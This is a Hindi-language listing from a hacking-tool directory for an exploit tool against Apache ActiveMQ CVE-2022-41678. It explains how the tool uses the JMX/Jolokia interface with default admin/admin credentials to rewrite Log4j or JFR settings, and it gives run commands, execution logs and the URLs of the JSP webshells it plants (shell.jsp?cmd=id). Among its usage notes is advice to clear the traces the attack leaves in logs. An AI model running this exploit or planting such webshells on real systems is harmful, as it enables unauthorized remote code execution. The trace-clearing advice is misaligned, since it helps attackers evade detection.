Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-41678 — CVE-2022-41678 Apache ActiveMQ में एक दूरस्थ कोड निष्पादन भेद्यता है। यह भेद्यता हमलावर को JMX (Java Management Extensions) इंटरफेस के माध्यम से Log4j कॉन्फ़िगरेशन या JFR (Java Flight Recorder) कॉन्फ़िगरेशन को संशोधित करने की अनुमति देती है, जिससे सर्वर के वेब निर्देशिका में एक दुर्भावनापूर्ण JSP वेबशेल लिखा जा सकता है, और अंततः दूरस्थ कोड निष्पादन को साकार किया जा सकता है। | Kitploit
उपकरण/GitHubGitHub/urjack2025/cve-2022-41678
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHuburjack2025/cve-2022-41678

CVE-2022-41678

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
2211 महीने पहलेअभी तक समीक्षित नहीं

विवरण

CVE-2022-41678 Apache ActiveMQ में एक दूरस्थ कोड निष्पादन भेद्यता है। यह भेद्यता हमलावर को JMX (Java Management Extensions) इंटरफेस के माध्यम से Log4j कॉन्फ़िगरेशन या JFR (Java Flight Recorder) कॉन्फ़िगरेशन को संशोधित करने की अनुमति देती है, जिससे सर्वर के वेब निर्देशिका में एक दुर्भावनापूर्ण JSP वेबशेल लिखा जा सकता है, और अंततः दूरस्थ कोड निष्पादन को साकार किया जा सकता है।

साझा करें

Apache ActiveMQ CVE-2022-41678 शोषण उपकरण

भेद्यता परिचय

संदर्भ दस्तावेज़: https://app.nextcyber.cn/courses/41/tasks/580

CVE-2022-41678 Apache ActiveMQ में एक रिमोट कोड निष्पादन भेद्यता है। यह भेद्यता हमलावर को JMX (Java Management Extensions) इंटरफ़ेस के माध्यम से Log4j कॉन्फ़िगरेशन या JFR (Java Flight Recorder) कॉन्फ़िगरेशन को संशोधित करने की अनुमति देती है, जिससे सर्वर के वेब निर्देशिका में एक दुर्भावनापूर्ण JSP webshell लिखा जा सकता है, और अंततः रिमोट कोड निष्पादन प्राप्त किया जा सकता है।

यह भेद्यता Apache ActiveMQ के कई संस्करणों को प्रभावित करती है, विशिष्ट प्रभावित संस्करण Log4j और JFR कॉन्फ़िगरेशन के उपयोग पर निर्भर करते हैं।

पर्यावरण आवश्यकताएँ

  • Python 3.6 और उससे ऊपर का संस्करण
  • आवश्यक निर्भरताएँ स्थापित करें:
    root@kitploit:~
    pip install requests
    
  • लक्ष्य ActiveMQ सर्वर पर JMX इंटरफ़ेस सक्षम होना चाहिए (सामान्यतः /api/jolokia/ पथ के माध्यम से एक्सेस किया जाता है)
  • हमलावर को ActiveMQ कंसोल का उपयोगकर्ता नाम और पासवर्ड जानना आवश्यक है (डिफ़ॉल्ट रूप से सामान्यतः admin/admin होता है)

उपयोग विधि

मूल उपयोग

डिफ़ॉल्ट admin/admin क्रेडेंशियल और स्वचालित रूप से पता लगाए गए शोषण विधि का उपयोग करें:

root@kitploit:~
python exp.py http://target:8161

इसके अलावा -u और -p पैरामीटर के माध्यम से उपयोगकर्ता नाम और पासवर्ड निर्दिष्ट किया जा सकता है:

root@kitploit:~
# Log4j का उपयोग करें
python exp.py -u admin -p admin http://10.22.174.214:8161

# निष्पादन परिणाम निम्नलिखित है
python exp.py -u admin -p admin http://10.22.174.214:8161
2025-10-14 22:53:54,115 - INFO - choice MBean 'org.apache.logging.log4j2:type=5faeada1' automatically
2025-10-14 22:53:54,334 - INFO - update log config
2025-10-14 22:53:54,467 - INFO - write webshell to http://10.22.174.214:8161/admin/shell.jsp?cmd=id
2025-10-14 22:53:54,655 - INFO - restore log config

डिफ़ॉल्ट रूप से उपयोग किए जाने वाले Log4j शोषण विधि के अलावा, --exploit jfr पैरामीटर का उपयोग करके JFR शोषण विधि निर्दिष्ट की जा सकती है।

root@kitploit:~
# JFR विधि का उपयोग करें
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161

# निष्पादन परिणाम निम्नलिखित है
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161/
2025-10-14 23:16:35,978 - INFO - choice MBean jdk.management.jfr:type=FlightRecorder manually
2025-10-14 23:16:37,390 - INFO - create flight record, id = 1
2025-10-14 23:16:37,533 - INFO - update configuration for record 1
2025-10-14 23:16:38,167 - INFO - start record
2025-10-14 23:16:39,243 - INFO - stop record
2025-10-14 23:16:39,309 - INFO - write webshell to http://10.22.174.214:8161/admin/shelljfr.jsp?cmd=id

शोषण परिणाम सत्यापित करें

सफलतापूर्वक शोषण के बाद, निम्नलिखित URL तक पहुँच कर कमांड निष्पादित किए जा सकते हैं:

root@kitploit:~
# Log4j विधि द्वारा लिखा गया webshell
http://target:8161/admin/shell.jsp?cmd=आदेश

# JFR विधि द्वारा लिखा गया webshell
http://target:8161/admin/shelljfr.jsp?cmd=आदेश

उदाहरण के लिए, id कमांड निष्पादित करें:

root@kitploit:~
http://target:8161/admin/shell.jsp?cmd=id

उपकरण पैरामीटर विवरण

पैरामीटरसंक्षिप्त नामप्रकारडिफ़ॉल्ट मानविवरण
--username-u字符串adminActiveMQ कंसोल का उपयोगकर्ता नाम
--password-p字符串adminActiveMQ कंसोल का पासवर्ड
--exploit-e字符串autoशोषण विधि, वैकल्पिक मान: auto, log4j, jfr
url-字符串-लक्ष्य ActiveMQ का URL पता (आवश्यक पैरामीटर)

ध्यान देने योग्य बातें

  1. यह उपकरण केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए है, कृपया अनधिकृत सिस्टम पर उपयोग न करें।
  2. सफल शोषण के बाद, उपकरण मूल Log4j कॉन्फ़िगरेशन को पुनर्स्थापित करने का प्रयास करेगा ताकि लक्ष्य सिस्टम पर प्रभाव को कम किया जा सके।
  3. यदि लक्ष्य सिस्टम पर नेटवर्क एक्सेस प्रतिबंध हैं, तो लक्ष्य के JMX इंटरफ़ेस तक पहुँच सुनिश्चित करने के लिए नेटवर्क कॉन्फ़िगरेशन को समायोजित करने की आवश्यकता हो सकती है।
  4. ActiveMQ के विभिन्न संस्करणों में अलग-अलग पथ और कॉन्फ़िगरेशन हो सकते हैं, वास्तविक स्थिति के अनुसार उपकरण में पथों को समायोजित करने की आवश्यकता हो सकती है।
  5. उपकरण JMX इंटरफ़ेस का उपयोग करके संचालित होता है, सुनिश्चित करें कि लक्ष्य ActiveMQ पर यह इंटरफ़ेस सक्षम है।
  6. इस उपकरण को निष्पादित करने से लक्ष्य सिस्टम पर लॉग रिकॉर्ड रह सकते हैं, कृपया संबंधित निशान साफ़ करने पर ध्यान दें।
टूल डाउनलोड करें